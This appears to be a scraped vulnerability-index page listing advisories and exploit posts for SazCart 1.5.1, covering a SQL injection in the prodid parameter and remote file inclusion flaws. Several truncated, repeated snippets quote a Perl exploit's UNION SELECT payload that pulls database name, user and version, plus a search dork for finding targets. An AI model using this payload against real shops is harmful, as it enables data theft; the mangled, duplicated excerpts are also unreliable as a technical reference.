EUVD-2008-2406

Malware in sbrugna...

EUVD-2008-2221

Malware in sbrugna...

SazCart 1.5.1 - Multiple Remote File Inclusion Vulnerabilities

No description provided by source. -========================================== ViVa Islam + YeMeN ====================================- Name : SazCart 1.5.1 Multiple Remote File Include Vulnerability Download From : http://www.sazcart.com/site/download.php?id=16 Found By : RoMaNcYxHaCkEr...

SazCart <= 1.5.1 (prodid) Remote SQL Injection Exploit

No description provided by source. !/usr/bin/perl SazCart = v1.5.1 details&prodid Remote SQL Injection Exploit HomePage: http://www.sazcart.com Discovered & Coded by JosS Contact: sys-projectathotmail.com Spanish Hackers Team / Sys - Project / EspSeC http://www.spanish-hackers.com rgod forever :D...

SazCart <= 1.5 (cart.php) Remote File Include Vulnerability

No description provided by source. sazcart v1.5 cart.php Remote File include ---Hitamputih crew--- Bug Found By : IbnuSina vendor : http://sazcart.com/site Risk : High Greetz : Solpot,permenhack,barbarosa,cah|gemblunkz,fungmen,setiawan,irvian,meteoroid and all member hitamputih crew community...

Sql injection

SQL injection vulnerability in index.php in SazCart 1.5.1 and earlier, when magicquotesgpc is disabled, allows remote attackers to execute arbitrary SQL commands via the prodid parameter in a details action...

CVE-2008-2411

SQL injection vulnerability in index.php in SazCart 1.5.1 and earlier, when magicquotesgpc is disabled, allows remote attackers to execute arbitrary SQL commands via the prodid parameter in a details action...

CVE-2008-2411

SQL injection vulnerability in index.php in SazCart 1.5.1 and earlier, when magicquotesgpc is disabled, allows remote attackers to execute arbitrary SQL commands via the prodid parameter in a details action...

CVE-2008-2411

CVE-2008-2411 concerns SQL injection in SazCart 1.5.1 and earlier, via the prodid parameter in the details action of index.php when magic_quotes_gpc is disabled. The affected product is SazCart, version 1.5.1 and earlier. Root cause: improper handling of user-supplied prodid leading to SQL comman...

CVE-2008-2224

Multiple PHP remote file inclusion vulnerabilities in SazCart 1.5.1, when registerglobals is enabled, allow remote attackers to execute arbitrary PHP code via a URL in the 1 sazsettingssitedir parameter to layouts/default/header.saz.php and the 2 sazsettingssiteurl parameter to...

CVE-2008-2224

Multiple PHP remote file inclusion vulnerabilities in SazCart 1.5.1, when registerglobals is enabled, allow remote attackers to execute arbitrary PHP code via a URL in the 1 sazsettingssitedir parameter to layouts/default/header.saz.php and the 2 sazsettingssiteurl parameter to...

CVE-2008-2224

CVE-2008-2224 affects SazCart 1.5.1. The vulnerability arises when PHP register_globals is enabled, enabling remote PHP code execution via crafted URLs in two parameters: _saz[settings][site_dir] to layouts/default/header.saz.php and _saz[settings][site_url] to admin/alayouts/default/pages/login....

SazCart &lt;= 1.5.1 &#40;prodid&#41; Remote SQL Injection Exploit

!/usr/bin/perl SazCart = v1.5.1 details&prodid Remote SQL Injection Exploit HomePage: http://www.sazcart.com Discovered & Coded by JosS Contact: sys-projectathotmail.com Spanish Hackers Team / Sys - Project / EspSeC http://www.spanish-hackers.com rgod forever :D Dork: "Powered by SazCart" print...

sazcart-sql.txt

!/usr/bin/perl SazCart new or die; my $go=$cnx-get$victim."?details&prodid=1'+union+all+select+0,1,convertconcatdatabase,char58,user,char58,version,char,3,4/"; if $go-content = m/Price:.?\br/ms print "+ $1\n\n"; else print "\n- exploit failed\n";...

SazCart 1.5.1 Multiple Remote File Inclusion Vulnerabilities

No description provided by source. -========================================== ViVa Islam + YeMeN ====================================- Name : SazCart 1.5.1 Multiple Remote File Include Vulnerability Download From : http://www.sazcart.com/site/download.php?id=16 Found By : RoMaNcYxHaCkEr...

SazCart <= 1.5.1 (prodid) Remote SQL Injection Exploit

Exploit for unknown platform in category web applications ====================================================== SazCart new or die; my $go=$cnx-get$victim."?details&prodid=1'+union+all+select+0,1,convertconcatdatabase,char58,user,char58,version,char,3,4/"; if $go-content = m/Price:.?\br/ms print...

SazCart &lt;= 1.5.1 (prodid) Remote SQL Injection Exploit

No description provided by source. !/usr/bin/perl SazCart = v1.5.1 details&prodid Remote SQL Injection Exploit HomePage: http://www.sazcart.com Discovered & Coded by JosS Contact: sys-projectathotmail.com Spanish Hackers Team / Sys - Project / EspSeC http://www.spanish-hackers.com rgod forever :D...

sazcart151-rfi.txt

-========================================== ViVa Islam + YeMeN ====================================- Name : SazCart 1.5.1 Multiple Remote File Include Vulnerability Download From : http://www.sazcart.com/site/download.php?id=16 Found By : RoMaNcYxHaCkEr RoMaNTiC-TeaM BlackxHat , BlackBox , aLwHEe...

SazCart 1.5.1 - &#039;prodid&#039; SQL Injection

!/usr/bin/perl SazCart new or die; my $go=$cnx-get$victim."?details&prodid=1'+union+all+select+0,1,convertconcatdatabase,char58,user,char58,version,char,3,4/"; if $go-content = m/Price:.?\br/ms print "+ $1\n\n"; else print "\n- exploit failed\n"; milw0rm.com 2008-05-09...

SazCart 1.5.1 - prodid SQL Injection

SazCart 1.5.1 - prodid SQL Injection !/usr/bin/perl SazCart new or die; my $go=$cnx-get$victim."?details&prodid=1'+union+all+select+0,1,convertconcatdatabase,char58,user,char58,version,char,3,4/"; if $go-content = m/Price:.?\br/ms print "+ $1\n\n"; else print "\n- exploit failed\n"; milw0rm.com...